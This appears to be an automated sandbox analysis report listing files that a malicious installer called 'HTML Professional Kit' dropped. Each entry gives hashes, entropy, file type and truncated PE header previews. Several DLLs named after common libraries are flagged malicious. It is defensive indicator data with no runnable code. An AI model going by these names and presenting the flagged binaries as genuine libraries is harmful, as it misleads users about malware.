SSDEEP:	49152:Tpd5jFYbBT2Efpmxp5b98ACQpiMOOu7Oc5T/o:TpTjFYbB68pmxppmJQpiMduTE
MD5:	B5CA3A47101C0C380453360DAD075AD8
SHA1:	53EA200831D57EED8F063E083F0C167857A08EB3
SHA-256:	E44B8DFC0B9C89560D59AC8A00099E36F4A333F4025A619DA29E19052653C55E
SHA-512:	57C0FD56D299B56E4F561FAECE68615E3AFD1B5A948B52D297F3A6E2DEF9BA6967A0D410B3D03B97AD06BFAC40FCDA22F9A1A0D78D9E84BDC16D70A0B94376AD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.~^..........+..........P....................@.........................................................................d........... ............................................................................................................text............................... ..`.rdata...(.......0..................@..@.data....S... ...0... ..............@....rsrc................P..............@..@.char9.......@.. ...................a...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\is-2KU66.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704282
Entropy (8bit):	6.476129879560284
Encrypted:	false
SSDEEP:	12288:dhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpO1+u1nWXExyd5:o/qrQ0yVrPg37AzHqA6Zfn013NWXExyn
MD5:	96BEDAD429C37FB4726D0B953CC83F74
SHA1:	0CD9ABE934E1030ADF00D03E7CEB331FF5336B9F
SHA-256:	DBBE144EB56FA30A1EC207AAD341D11404113B9FA4BA0C3331DE79173AA038A1
SHA-512:	230A48DFE69541AB9F5269F3184B0EEEA9E5681330F971A08C6554D3C85A0A9D98605F0DBF9060A0349D452298C6959768CA9BF30B84EA3BF5E29C44E1B502C1
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\is-EPH22.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105784
Entropy (8bit):	6.258144336244945
Encrypted:	false
SSDEEP:	1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
MD5:	0C6452935851B7CDB3A365AECD2DD260
SHA1:	83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
SHA-256:	F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
SHA-512:	5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\is-KPHSL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	40974
Entropy (8bit):	6.485702128133584
Encrypted:	false
SSDEEP:	768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
MD5:	F47E78AD658B2767461EA926060BF3DD
SHA1:	9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
SHA-256:	602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
SHA-512:	216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\is-MJB4L.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	176200
Entropy (8bit):	6.647007817777345
Encrypted:	false
SSDEEP:	1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
MD5:	6896DC57D056879F929206A0A7692A34
SHA1:	D2F709CDE017C42916172E9178A17EB003917189
SHA-256:	8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
SHA-512:	CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\is-N48NI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	125637
Entropy (8bit):	6.2640431186303145
Encrypted:	false
SSDEEP:	3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
MD5:	6231B452E676ADE27CA0CEB3A3CF874A
SHA1:	F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
SHA-256:	9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
SHA-512:	F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\is-Q84B1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68552
Entropy (8bit):	6.1042544770100395
Encrypted:	false
SSDEEP:	768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
MD5:	F06B0761D27B9E69A8F1220846FF12AF
SHA1:	E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
SHA-256:	E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
SHA-512:	5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\is-QV29H.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	data
Category:	dropped
Size (bytes):	1740576
Entropy (8bit):	7.106985574868644
Encrypted:	false
SSDEEP:	49152:Upd5jFYbBT2Efpmxp5b98ACQpiMOOu7Oc5T/o:UpTjFYbB68pmxppmJQpiMduTE
MD5:	320E1252AAB3AF1BB1E72C68BD304FC9
SHA1:	A65AC77E4DA61C8D2D94D49A1E935C9E2C5DCB77
SHA-256:	BCAEC428BDD3703E020BC8C0F074880FD9B21AF092E7922FDE369CA83446EBAC
SHA-512:	7875643338889FB585921BDE16E31561400D4FF42205432D586EB5D44B3E02467931F4DA312F9E601ADD1C39372CFF58AF1F124904BE8642BEA60C3607D2EFE8
Malicious:	false
Reputation:	unknown
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.~^..........+..........P....................@.........................................................................d........... ............................................................................................................text............................... ..`.rdata...(.......0..................@..@.data....S... ...0... ..............@....rsrc................P..............@..@.char9.......@.. ...................a...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\is-SG0PM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	125637
Entropy (8bit):	6.2640431186303145
Encrypted:	false
SSDEEP:	3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
MD5:	6231B452E676ADE27CA0CEB3A3CF874A
SHA1:	F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
SHA-256:	9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
SHA-512:	F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\libbz2-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105784
Entropy (8bit):	6.258144336244945
Encrypted:	false
SSDEEP:	1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
MD5:	0C6452935851B7CDB3A365AECD2DD260
SHA1:	83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
SHA-256:	F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
SHA-512:	5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\libgcc_s_dw2-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	125637
Entropy (8bit):	6.2640431186303145
Encrypted:	false
SSDEEP:	3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
MD5:	6231B452E676ADE27CA0CEB3A3CF874A
SHA1:	F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
SHA-256:	9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
SHA-512:	F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\libogg-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	40974
Entropy (8bit):	6.485702128133584
Encrypted:	false
SSDEEP:	768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
MD5:	F47E78AD658B2767461EA926060BF3DD
SHA1:	9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
SHA-256:	602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
SHA-512:	216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\libvorbis-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	176200
Entropy (8bit):	6.647007817777345
Encrypted:	false
SSDEEP:	1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
MD5:	6896DC57D056879F929206A0A7692A34
SHA1:	D2F709CDE017C42916172E9178A17EB003917189
SHA-256:	8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
SHA-512:	CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\libwinpthread-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68552
Entropy (8bit):	6.1042544770100395
Encrypted:	false
SSDEEP:	768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
MD5:	F06B0761D27B9E69A8F1220846FF12AF
SHA1:	E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
SHA-256:	E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
SHA-512:	5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	InnoSetup Log HTML Professional Kit, version 0x30, 4732 bytes, 910646\user, "C:\Users\user\AppData\Local\HTML Professional Kit"
Category:	dropped
Size (bytes):	4732
Entropy (8bit):	4.73602683155518
Encrypted:	false
SSDEEP:	96:CIaIdWG38LprAGNgV97+eOIhPW4cVSQs0LnkJv:3rdWG3gpr5HIhvcVSQ1ns
MD5:	67E7AE50894CC1A21169D8F8F70734A9
SHA1:	630EDF65D94B7813A6F359B0E6004EEDE4BBB571
SHA-256:	E5E6D7E15317EF0102259F9C9B4AFD0215EAFAF05ABAA2CEE3A2F898696212D7
SHA-512:	DEBE76DEC3656AC9DA464FE37E75764ADB891BBFE545A011E665EB2A3C17DB9EC5A82EB4BACC8C0DC9D12DEBC43F17291DA0313E37BBAF867D4ECE88910A3248
Malicious:	false
Reputation:	unknown
Preview:	Inno Setup Uninstall Log (b)....................................HTML Professional Kit...........................................................................................................HTML Professional Kit...........................................................................................................0.......\|...%.................................................................................................................A...................R....910646.user2C:\Users\user\AppData\Local\HTML Professional Kit.................. .....A......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User

C:\Users\user\AppData\Local\HTML Professional Kit\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704282
Entropy (8bit):	6.476129879560284
Encrypted:	false
SSDEEP:	12288:dhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpO1+u1nWXExyd5:o/qrQ0yVrPg37AzHqA6Zfn013NWXExyn
MD5:	96BEDAD429C37FB4726D0B953CC83F74
SHA1:	0CD9ABE934E1030ADF00D03E7CEB331FF5336B9F
SHA-256:	DBBE144EB56FA30A1EC207AAD341D11404113B9FA4BA0C3331DE79173AA038A1
SHA-512:	230A48DFE69541AB9F5269F3184B0EEEA9E5681330F971A08C6554D3C85A0A9D98605F0DBF9060A0349D452298C6959768CA9BF30B84EA3BF5E29C44E1B502C1
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	3FD5C0634443FB2EF2796B9636159CB6
SHA1:	366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
SHA-256:	58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
SHA-512:	8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fSJI2dwukNtWVEjIwlXBl7N4.exe.log

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g1nHVnlr2tXTEWQsRz_M547D.exe.log

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002c.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	106000
Entropy (8bit):	4.02166139585713
Encrypted:	false
SSDEEP:	768:E7FioIKjdkaG8fvwUtjk0O6Pq9+Se8zGNmLmDcJzy4JxzHkR1vIoVYsizmEDypXF:IJkonAOe91z7NfphMiNG7nU1FY+KPZht
MD5:	54197D3656DA5DFABCEB360D65373831
SHA1:	CB4C2B36F84C304826EADC8CE78BF3055F8038DF
SHA-256:	56E7E908C6B087334D39D9258F2102F431FC48335980FA4C9FADAD9CE63AF6D0
SHA-512:	0C2C898E8F0BF2C3C16DC025C714DDA70C5B90BB7C48D7BC6511BA1B9FF6C3C64E53D58940B43F2233B262E51594AFD1DA62EED1B5B405E38F1C5E9BC95F7E43
Malicious:	false
Reputation:	unknown
Preview:	....h... ..............P..............Y...8...^...p...................W.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe

Download File

